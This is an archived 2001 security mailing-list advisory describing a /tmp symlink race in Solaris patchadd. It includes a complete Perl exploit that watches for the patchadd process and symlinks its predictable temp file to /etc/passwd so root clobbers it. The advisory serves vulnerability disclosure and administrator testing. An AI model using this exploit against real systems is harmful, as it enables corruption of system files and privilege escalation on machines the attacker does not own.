[EXPL] Solaris Patchadd Symlink Exploit
From: support@securiteam.comDate: 08/31/01
- Previous message: support@securiteam.com: "[TOOL] Cute-FTP Stored Password Decoder"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: support@securiteam.com To: list@securiteam.com Subject: [EXPL] Solaris Patchadd Symlink Exploit Message-Id: <20010831145520.DF11C138BF@mail.der-keiler.de> Date: Fri, 31 Aug 2001 16:55:20 +0200 (CEST)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -
Solaris Patchadd Symlink Exploit
------------------------------------------------------------------------
SUMMARY
Patchadd is the patch management tool included with the Solaris Operating
Environment, distributed by Sun Microsystems. A security problem in this
application allows a local user to corrupt or append system files.
The following is an exploit code that can be used by administrator to test
their system for the mentioned vulnerability.
DETAILS
Vulnerable systems:
Sun Solaris 8.0
Sun Solaris 7.0
Sun Solaris 2.6
Sun Solaris 2.5.1
The problem exists in the creation of /tmp files by patchadd. Patchadd
creates a variety of files in /tmp while installing the patches on the
operating system. The files created in /tmp are mode 0666, and are created
with the extension sh.1, sh.2, and so on. Running the program requires
administrative access. It is possible to brute force guess the pid of
patchadd, and create files in the /tmp directory that are symbolic links
to sensitive system files.
It is therefore possible for a user with malicious intent to gain elevated
privileges, corrupt system files, or executes arbitrary commands.
Exploit:
#!/usr/local/bin/perl
#Exploit for patchadd Solaris 2.x. Symlink /tmp file creation
#vulnerability
#patchadd creates files in /tmp with mode 644 that can be used to clobber
#system files when executed by root.
#Larry W. Cashdollar
#http://vapid.dhs.org:8080
#Discovery credit: Jonathan Fortin jfortin@revelex.com
#Tested on SunOS smackdown 5.8 Generic_108528-10 sun4u sparc
SUNW,Ultra-5_10
use strict;
my $NOISY = 1; # Do you want quiet output?
my $clobber = "/etc/passwd";
print "Listening for patchadd process...\n" if ($NOISY);
while(1) {
open (ps,"ps -ef | grep -v grep |grep -v PID |");
while(<ps>) {
my @args = (split " ", $_);
if (/patch/) {
print "Targeting PID $args[1] and symlinking response.$args[1] to
$clobber\n" if ($NOISY);
symlink($clobber,"/tmp/response.$args[1]");
exit(1);
}
}
}
ADDITIONAL INFORMATION
The information has been provided by <mailto:lwc@Vapid.dhs.org> Larry W.
Cashdollar.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: support@securiteam.com: "[TOOL] Cute-FTP Stored Password Decoder"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
